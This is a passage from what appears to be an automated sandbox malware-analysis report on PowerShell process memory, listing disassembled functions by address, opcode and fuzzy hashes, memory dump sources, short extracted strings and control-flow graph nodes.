                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ae38c1b182f72a99ece6a94c4721789716ad69c58132f1df2d590ea75335af02
                                                                                          • Instruction ID: bfa9b1f24c38c6abf119b858594565f77d6ce268297bd98881484e5564e5ee14
                                                                                          • Opcode Fuzzy Hash: ae38c1b182f72a99ece6a94c4721789716ad69c58132f1df2d590ea75335af02
                                                                                          • Instruction Fuzzy Hash: 44E02652305115079F9431BD08103AA6DC98BC5496F0907BFCE04C3261ED80EC2903E2
                                                                                          Function 0485896A Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d83ad7b0e986b0ccf69977ce57563d2ab7823f3a694029f8e8182fe3bcc87be0
                                                                                          • Instruction ID: e88b44cc2c4b2890abbf3602c33a431e83c56c6acf2be31de5c5df91a2424148
                                                                                          • Opcode Fuzzy Hash: d83ad7b0e986b0ccf69977ce57563d2ab7823f3a694029f8e8182fe3bcc87be0
                                                                                          • Instruction Fuzzy Hash: 07E022B13082518BDB09A778A41C3AD3EA6EBC5729F00002EEA0983283CFE9180183D6
                                                                                          Function 0485DCD9 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d73078de15f699f24e0e620efbb85a12a4e55c068709792b43787504efe7057d
                                                                                          • Instruction ID: e7efb18aa1018a4c777bacb566487d94279966f7b50b74d15c4577f592642cff
                                                                                          • Opcode Fuzzy Hash: d73078de15f699f24e0e620efbb85a12a4e55c068709792b43787504efe7057d
                                                                                          • Instruction Fuzzy Hash: DFE02231B04094978B098A6CD4484E8BFA1AFC8220F04C67FD80AEB250DA31A81587E1
                                                                                          Function 04859168 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4db8ae05083e67fcb56655dd37b3a0a694c081e84061eb6c112513bb12b885a4
                                                                                          • Instruction ID: a5717e6835a21e6fb34501819d6947709492d0930b404726ddcd023efed244ea
                                                                                          • Opcode Fuzzy Hash: 4db8ae05083e67fcb56655dd37b3a0a694c081e84061eb6c112513bb12b885a4
                                                                                          • Instruction Fuzzy Hash: 0EF0ED709003149BD764EFB9E49C7AA7BE9FB44310F10446DE55ED7351DF3969808B90
                                                                                          Function 04858978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2e9ea4cb116f52d6eb6bea1edfdc0df1fe44c3f1f56840b47a787b2eb257d71e
                                                                                          • Instruction ID: de6c353ebdd640586ebbeb8533429fef39e88cea0c49f226f1b94da58df9e2e3
                                                                                          • Opcode Fuzzy Hash: 2e9ea4cb116f52d6eb6bea1edfdc0df1fe44c3f1f56840b47a787b2eb257d71e
                                                                                          • Instruction Fuzzy Hash: 3FE0DF3530421087CB09B779A41C2AE7AA6EBC5724F00002EEA0A83343CFF9194183D6
                                                                                          Function 04859550 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b3501789c60b1bc1ef865f0e5dd1d27a58315123eb3f0eab0b7a79f5ff93145
                                                                                          • Instruction ID: dfefac4375cfdea87abb2e92173a74dff008af08039ab99c65d84560a7d26082
                                                                                          • Opcode Fuzzy Hash: 5b3501789c60b1bc1ef865f0e5dd1d27a58315123eb3f0eab0b7a79f5ff93145
                                                                                          • Instruction Fuzzy Hash: B7D05E12702125171A9831BE18006BBA5DE8AC48A5705077BDE09C3261EE84EC2903F2
                                                                                          Function 0485DCE8 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 7fdb1b3b893673297e9e080d9ec02242f4dea911d1704c0397544655d5fb2865
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: C5E08631B10018978B089959D4104EDF7AADBCC224F04C47ADD0AE7350DA32691586E1
                                                                                          Function 0485AF88 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ca69d8a339886a707d12789c30e609952a030458a995378fc801a54b14d1fbfd
                                                                                          • Instruction ID: 9e1d8a98326f6548c820d086b8d0d4a9ba1b2f6b122564b137ba92a60a6c9070
                                                                                          • Opcode Fuzzy Hash: ca69d8a339886a707d12789c30e609952a030458a995378fc801a54b14d1fbfd
                                                                                          • Instruction Fuzzy Hash: 0AD02B6770C1D207EF1B803D74606AA4FE78BC622070AC779E844C7700CC818C0643D0
                                                                                          Function 0485F868 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c33ef2ffdb5713035e437ce3fc360f2e09cb86eefe614fecd14f0afffb297fe8
                                                                                          • Instruction ID: 182526ec107ee5b6d2dc2d58c945616829122f8386fda94fd33d8621615899b5
                                                                                          • Opcode Fuzzy Hash: c33ef2ffdb5713035e437ce3fc360f2e09cb86eefe614fecd14f0afffb297fe8
                                                                                          • Instruction Fuzzy Hash: 5EE06D70D042898FCB40DFB9C58126DBFF0AB09614B2086AECA59D6215E7715611DB81
                                                                                          Function 04858739 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: edae7e80b318afed38f0b6cfdc21197d752dc66dad2d95013dfdf64caf09c8f3
                                                                                          • Instruction ID: eb95863081732a032e002cb3733a161ab69aeff6deb7a948e8575d3a17b62492
                                                                                          • Opcode Fuzzy Hash: edae7e80b318afed38f0b6cfdc21197d752dc66dad2d95013dfdf64caf09c8f3
                                                                                          • Instruction Fuzzy Hash: 2BE04F31C0514ACBCB09EF78E98E8FDBF70EA11311B00029ED91792161DF30165ACE86
                                                                                          Function 04858800 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0e7d42db18e268a5884df7b7df939ddc40e3b3f37baa87a2b37c752e245c255
                                                                                          • Instruction ID: 983056b3f7abddbd54a67b27b83ae31311d536580e8b47b6b34a26871ea69f30
                                                                                          • Opcode Fuzzy Hash: d0e7d42db18e268a5884df7b7df939ddc40e3b3f37baa87a2b37c752e245c255
                                                                                          • Instruction Fuzzy Hash: B8E04F75A0824ACFC704EFA4E59986A7FB4EB49200F1041ADDD4597766EE306851DB82
                                                                                          Function 0485F878 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 2d85a6f6f49e46b5a6824f42315c1d325e74fd64fd0e1702351f2c1c4cdbb02d
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: FBD06271D0420D9F8780EFADC94156DFBF4EB48204F5085AA8A19D7315F7315612DFD1
                                                                                          Function 04858748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c259c4bcec5edaea10cfe732bb68f41567afc10edc5223614733414e7bbaf2c8
                                                                                          • Instruction ID: ac3dc9541aca55ad7af0e4fbf20d6bee900c1015565c37f775596ad2cbb1e9da
                                                                                          • Opcode Fuzzy Hash: c259c4bcec5edaea10cfe732bb68f41567afc10edc5223614733414e7bbaf2c8
                                                                                          • Instruction Fuzzy Hash: 07D0673190510DCBCB08EBA5F85E4BDBB74FA14305F40416ED91792191EF312A9ACAC6
                                                                                          Function 04858810 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e12fcc75a925227fab5f0967d3a94ed6cdd0aa6c630891f4c3157677cd56d79d
                                                                                          • Instruction ID: 7c1be84a1cbe889b1e31942b61cd28ee4ce949baff7fb0de717bc432f2d53a32
                                                                                          • Opcode Fuzzy Hash: e12fcc75a925227fab5f0967d3a94ed6cdd0aa6c630891f4c3157677cd56d79d
                                                                                          • Instruction Fuzzy Hash: A2D01734A0820ACB8B08EFA4E84A87EBBB4EB48204F00416EDD0A93351EA306C51CBC1
                                                                                          Function 04857932 Relevance: .0, Instructions: 14COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c1a53b33723eb97add0f8eb2d6594f031489c313417083084b191c592936c61b
                                                                                          • Instruction ID: c404bb3449377241b6d5247c3aec3d6bba7309f24aeb27bf6c0cdce3a298ce4f
                                                                                          • Opcode Fuzzy Hash: c1a53b33723eb97add0f8eb2d6594f031489c313417083084b191c592936c61b
                                                                                          • Instruction Fuzzy Hash: 61D0C93444E3C8AFC7179F789899C553F789E4352470A04DED88A9F1B7CA668449CB16
                                                                                          Function 04857EA0 Relevance: .0, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 384bd56e7fcec81bbd39cedfb5ece26bae9fd8cf2ffcb1fdb722d7d1c30bd477
                                                                                          • Instruction ID: e4529f74827aab0b6f529147d6e8f0788bb3cf5b64e4a41da4f5923b9846c169
                                                                                          • Opcode Fuzzy Hash: 384bd56e7fcec81bbd39cedfb5ece26bae9fd8cf2ffcb1fdb722d7d1c30bd477
                                                                                          • Instruction Fuzzy Hash: 2AC04C1841E3D01FEF13873589D96127FB2098392970B51CAD181DE467C668880AD763
                                                                                          Function 04857940 Relevance: .0, Instructions: 8COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2cb084c4929339073be94e8185c1f00ebda9db1b7f2c0013b206e5ab3f91eb6f
                                                                                          • Instruction ID: 50b467bd095f552b731601e9cbfe28238387dc87a5b62cbd72164b2d612bcae2
                                                                                          • Opcode Fuzzy Hash: 2cb084c4929339073be94e8185c1f00ebda9db1b7f2c0013b206e5ab3f91eb6f
                                                                                          • Instruction Fuzzy Hash: AFB092341457088FC3486F75A408824732DEB40615B8104A8E80E0A2A68E76E884CA45

                                                                                          Non-executed Functions

                                                                                          Function 076C3678 Relevance: 10.2, Strings: 8, Instructions: 192COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$]$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-3777635414
                                                                                          • Opcode ID: 712c38f98d7813f081aeeec9692a904fc4b19aa7a9207b7eb0c525df879d066e
                                                                                          • Instruction ID: cc9d51d3f7d3daa79bc1f7cefb3793e06e7feeb747b643bd1c14d72d1867df3c
                                                                                          • Opcode Fuzzy Hash: 712c38f98d7813f081aeeec9692a904fc4b19aa7a9207b7eb0c525df879d066e
                                                                                          • Instruction Fuzzy Hash: D95114F17052469BCB24DA7A8911776BBA6EFC2610F24C06FD546CB341DB35C881CBA3
                                                                                          Function 076C0488 Relevance: 6.7, Strings: 5, Instructions: 485COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: fkq$4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-1499809691
                                                                                          • Opcode ID: a6f0fff5b4afc98a94092b0a72350f4c3b53d3f70ab8eac89fd7929518e5fdbf
                                                                                          • Instruction ID: 7cb48fa1af7734b5b0e5a795a72bc829d35103ff2e5407eda1db5b43083e2b8e
                                                                                          • Opcode Fuzzy Hash: a6f0fff5b4afc98a94092b0a72350f4c3b53d3f70ab8eac89fd7929518e5fdbf
                                                                                          • Instruction Fuzzy Hash: BBF1F3B1B04245CFCB25DBB8881177ABBA6EFC6214F14C0AED546CB752DA35CC46CBA1
                                                                                          Function 076C1D80 Relevance: 6.5, Strings: 5, Instructions: 296COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ck$4'fq$4'fq$tPfq$tPfq
                                                                                          • API String ID: 0-3335184582
                                                                                          • Opcode ID: 698f4be826ba1759bec49e49e2325ca6001215f062ba10fa10e554a28829674e
                                                                                          • Instruction ID: eb74062fa8f265ade122b7e09f1b1b62d417a5325697f7d7d6e465494447c574
                                                                                          • Opcode Fuzzy Hash: 698f4be826ba1759bec49e49e2325ca6001215f062ba10fa10e554a28829674e
                                                                                          • Instruction Fuzzy Hash: 24A12BF1B0420A8FD725DA798410677FBA6EFC6210F1880AFD956DB346CB35C845C7A1
                                                                                          Function 04857A21 Relevance: 5.2, Strings: 4, Instructions: 241COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: 260216084664b824065f148567cc778816119870750f0e763e02eac8dcbbd94d
                                                                                          • Instruction ID: 66bae939ff359abcd84efecb455aa059710ef8561e32d6b4270c0d258ad261a9
                                                                                          • Opcode Fuzzy Hash: 260216084664b824065f148567cc778816119870750f0e763e02eac8dcbbd94d
                                                                                          • Instruction Fuzzy Hash: A8B1A674E012099FDB55DFA9D980A9EFBF2FF48300F109629E819AB315DB34A945CF90
                                                                                          Function 04857A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1803592875.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_4850000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `gq$`gq$`gq$`gq
                                                                                          • API String ID: 0-3352594996
                                                                                          • Opcode ID: f4951c19607c0a963c12f8ab872a543c80d2418e5013e749b95db44883995745
                                                                                          • Instruction ID: 6cc6e964e3ad5ac8e0e6ddb00a07370dede1c18eda23fe05266b3666a234b66e
                                                                                          • Opcode Fuzzy Hash: f4951c19607c0a963c12f8ab872a543c80d2418e5013e749b95db44883995745
                                                                                          • Instruction Fuzzy Hash: DCB1A674E002099FDB54DFA9D980A9EFBF2FF48304F109629E819AB315DB30A945CF90
                                                                                          Function 076C5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $fq$$fq$$fq$$fq
                                                                                          • API String ID: 0-2113499236
                                                                                          • Opcode ID: ad0c2ac4cba6797980a07be301cf8081da4617e6493c710891a428a4b51d0ec8
                                                                                          • Instruction ID: 1584c3a8d5694ee6b627ba70685b15a813ed66696817a0917c0010c96b2819b3
                                                                                          • Opcode Fuzzy Hash: ad0c2ac4cba6797980a07be301cf8081da4617e6493c710891a428a4b51d0ec8
                                                                                          • Instruction Fuzzy Hash: D22123B17112229BDB38DA7A8C41737BB9AEBC0755F34802EA50BCB382DD75E8518361
                                                                                          Function 076C0308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1818925684.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_76c0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$$fq$$fq
                                                                                          • API String ID: 0-2206495126
                                                                                          • Opcode ID: 8dc4a382a2d168c3b709a4be1dfae70ec3105bd6c80c2f775034a615ccfef676
                                                                                          • Instruction ID: af7517b1fe109feb978f9634076e627036a03f3f4233fa8cf6b3371c2f749bd1
                                                                                          • Opcode Fuzzy Hash: 8dc4a382a2d168c3b709a4be1dfae70ec3105bd6c80c2f775034a615ccfef676
                                                                                          • Instruction Fuzzy Hash: B801A76170D3C68FCB2B967898201667FB6AF83550B1941DBC08ADF397CE198D0687B7

                                                                                          Execution Graph

                                                                                          Execution Coverage:6.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 20006 8c56890 20007 8c568d3 SetThreadToken 20006->20007 20008 8c56901 20007->20008

                                                                                          Executed Functions

                                                                                          Function 04C6B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 375 4c6b490-4c6b4a9 376 4c6b4ae-4c6b7f5 call 4c6acbc 375->376 377 4c6b4ab 375->377 377->376
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1848246543.0000000004C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_4c60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {Ym^$Ym^
                                                                                          • API String ID: 0-2374741261
                                                                                          • Opcode ID: 7c08e3baefd1fea2cb4002c25960df2c49e4d2200fa889732beb7e4766fc6b99
                                                                                          • Instruction ID: bbdb5d7794ea18c91ad26a6055487251e89430fcb265f67dbeb37e7af466ab01
                                                                                          • Opcode Fuzzy Hash: 7c08e3baefd1fea2cb4002c25960df2c49e4d2200fa889732beb7e4766fc6b99
                                                                                          • Instruction Fuzzy Hash: A5916CB4F007245BDB19DFB58A5066EBBA6EFC4600B008929E106AF394DF39AD018BD5
                                                                                          Function 07AE3CE8 Relevance: 5.6, Strings: 4, Instructions: 571COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 7ae3ce8-7ae3d0d 1 7ae3d13-7ae3d18 0->1 2 7ae3f00-7ae3f4a 0->2 3 7ae3d1a-7ae3d20 1->3 4 7ae3d30-7ae3d34 1->4 14 7ae40ce-7ae4112 2->14 15 7ae3f50-7ae3f55 2->15 5 7ae3d24-7ae3d2e 3->5 6 7ae3d22 3->6 7 7ae3d3a-7ae3d3c 4->7 8 7ae3eb0-7ae3eba 4->8 5->4 6->4 12 7ae3d3e-7ae3d4a 7->12 13 7ae3d4c 7->13 10 7ae3ebc-7ae3ec5 8->10 11 7ae3ec8-7ae3ece 8->11 18 7ae3ed4-7ae3ee0 11->18 19 7ae3ed0-7ae3ed2 11->19 21 7ae3d4e-7ae3d50 12->21 13->21 29 7ae4228-7ae425d 14->29 30 7ae4118-7ae411d 14->30 16 7ae3f6d-7ae3f71 15->16 17 7ae3f57-7ae3f5d 15->17 26 7ae3f77-7ae3f79 16->26 27 7ae4080-7ae408a 16->27 22 7ae3f5f 17->22 23 7ae3f61-7ae3f6b 17->23 24 7ae3ee2-7ae3efd 18->24 19->24 21->8 28 7ae3d56-7ae3d75 21->28 22->16 23->16 32 7ae3f7b-7ae3f87 26->32 33 7ae3f89 26->33 34 7ae408c-7ae4094 27->34 35 7ae4097-7ae409d 27->35 67 7ae3d77-7ae3d83 28->67 68 7ae3d85 28->68 53 7ae425f-7ae4281 29->53 54 7ae428b-7ae4295 29->54 37 7ae411f-7ae4125 30->37 38 7ae4135-7ae4139 30->38 39 7ae3f8b-7ae3f8d 32->39 33->39 40 7ae409f-7ae40a1 35->40 41 7ae40a3-7ae40af 35->41 44 7ae4129-7ae4133 37->44 45 7ae4127 37->45 46 7ae413f-7ae4141 38->46 47 7ae41da-7ae41e4 38->47 39->27 49 7ae3f93-7ae3fb2 39->49 50 7ae40b1-7ae40cb 40->50 41->50 44->38 45->38 51 7ae4143-7ae414f 46->51 52 7ae4151 46->52 55 7ae41e6-7ae41ee 47->55 56 7ae41f1-7ae41f7 47->56 91 7ae3fb4-7ae3fc0 49->91 92 7ae3fc2 49->92 63 7ae4153-7ae4155 51->63 52->63 98 7ae42d5-7ae42fe 53->98 99 7ae4283-7ae4288 53->99 60 7ae429f-7ae42a5 54->60 61 7ae4297-7ae429c 54->61 65 7ae41fd-7ae4209 56->65 66 7ae41f9-7ae41fb 56->66 71 7ae42ab-7ae42b7 60->71 72 7ae42a7-7ae42a9 60->72 63->47 74 7ae415b-7ae415d 63->74 75 7ae420b-7ae4225 65->75 66->75 70 7ae3d87-7ae3d89 67->70 68->70 70->8 77 7ae3d8f-7ae3d96 70->77 79 7ae42b9-7ae42d2 71->79 72->79 80 7ae415f-7ae4165 74->80 81 7ae4177-7ae417e 74->81 77->2 83 7ae3d9c-7ae3da1 77->83 87 7ae4169-7ae4175 80->87 88 7ae4167 80->88 89 7ae4196-7ae41d7 81->89 90 7ae4180-7ae4186 81->90 95 7ae3db9-7ae3dc8 83->95 96 7ae3da3-7ae3da9 83->96 87->81 88->81 100 7ae418a-7ae4194 90->100 101 7ae4188 90->101 93 7ae3fc4-7ae3fc6 91->93 92->93 93->27 102 7ae3fcc-7ae4003 93->102 95->8 113 7ae3dce-7ae3dec 95->113 104 7ae3dad-7ae3db7 96->104 105 7ae3dab 96->105 115 7ae432d-7ae435c 98->115 116 7ae4300-7ae4326 98->116 100->89 101->89 126 7ae401d-7ae4024 102->126 127 7ae4005-7ae400b 102->127 104->95 105->95 113->8 123 7ae3df2-7ae3e17 113->123 124 7ae435e-7ae437b 115->124 125 7ae4395-7ae439f 115->125 116->115 123->8 149 7ae3e1d-7ae3e24 123->149 143 7ae437d-7ae438f 124->143 144 7ae43e5-7ae43ea 124->144 131 7ae43a8-7ae43ae 125->131 132 7ae43a1-7ae43a5 125->132 133 7ae403c-7ae407d 126->133 134 7ae4026-7ae402c 126->134 129 7ae400f-7ae401b 127->129 130 7ae400d 127->130 129->126 130->126 137 7ae43b4-7ae43c0 131->137 138 7ae43b0-7ae43b2 131->138 135 7ae402e 134->135 136 7ae4030-7ae403a 134->136 135->133 136->133 142 7ae43c2-7ae43e2 137->142 138->142 143->125 144->143 152 7ae3e6a-7ae3e9d 149->152 153 7ae3e26-7ae3e41 149->153 163 7ae3ea4-7ae3ead 152->163 157 7ae3e5b-7ae3e5f 153->157 158 7ae3e43-7ae3e49 